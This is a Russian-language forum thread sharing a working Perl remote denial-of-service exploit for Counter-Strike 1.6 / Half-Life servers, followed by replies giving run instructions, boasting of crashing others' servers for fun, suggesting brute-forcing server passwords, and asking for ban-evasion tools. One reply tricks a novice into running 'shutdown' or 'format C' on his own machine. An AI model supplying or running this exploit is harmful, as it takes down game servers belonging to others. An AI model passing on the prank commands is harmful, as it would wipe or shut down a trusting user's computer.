CS-sploit

нашел рульный сплот убивающий серваки CS:

#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
# dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

все пашет....но запероленный сервак..не берет..вылетает : $BADPASSWORD
$BADPASSWORD

у кого какие соображения будут ?

 

у меня никаких, ну впринципе если ты напишешь брут к серву, потом пробрутишь валидный пароль, потом составишь эксплойт, так чтоб он передавал пароль, то может и зачёт сдаш

 

у меня появились - защищу свой сервер

 

Не плохой сплойт.
Спасибо!

 

Сам тащусь..... но все таки ! как можно реализовать...подвес запорленных серваков? и еще допустим я добыл пароль , куда его можно прописать.

 

подскажите пожалуйста куда сам сплойт пихать чтоб отрубить сервак?

 

Вощем смари сюда ! Нажимаеш Пуск-Выполнить- Shutdown -t 00 вроде так если не поможет то вот так format C там вощем окошко появится в которое эту шнягу вбить надо и нажать CTRL+ENTER ! Спрашиваеш почему все так сложно ? а потому что мы же хакеры и способы у нас должны быть хакерские так что давай жги сервы !

 

ОТВЕТ - НИКАК! Зависание происходит уже после приконекчивания.

 

remote DoS exploit

Сплойт рулит!!
а где ты его добыл??

 

а как этот сплойт включать? я на сервак зайдуи как сплоит активировать?

 

пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS

 

Там был вопрос где ты его достал? я не он но скажу что где угодно =) я этот сплойт увидел еще месяцев 6 назад и вообще и считаю что такие вещи должны быть приватными , ибо всякие ....... кхм нехорошие люди вешают сервы дайте вы поиграть то нормально и скажите зачем вам это надо ? ( я не в счёт =)) я рубил рублю и буду рубить сервы а почему ? потому-что прикольно )

 

Haz3r, уже неважно 4то сабж давно паблик, т.к. на 28 пат4е по слухам (т.к. сам не дока4ал =) уже уязвимости нет

 

и нас4ет брута: еще для 45-46 протоколов были готовые реализации...

 

кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...

 

2kipfun: пишу как ты и сказал "c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx" пишит мне
****

A00000000 1617623932 2

>****connect 47 1617623932 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a362 58af1bb64
ed866538c9db76""\"
****9Invalid hashed CD key.

Можети обьснить мне что это такое?

 

неверный CD ключ, введи в строку (cdkey\\f0ef8a362 58af1bb64ed866538c9db76) действительный ключ...

 

2kipfun: а ты пробывал? сам пользватся этим експлойтом?

 

обижашь в своей локалке житья никому не даю...... рубит все серваки на повал! и хл и кс 1.6, тока под паролем не берет..... а так все на ура..! у тебя может не идти потому что может патч послдений поставили, в них этот баг исправили.....не заню в нет это актуально будет еще не много....а в локалках еще долго...

 

Я открываю перл делаю как ва написали,мне пишет:
<Do you need to predeclare pl?>
А этот сплоит куда пихать надо?
как можно бан в кс снять?
Подскажите чтото*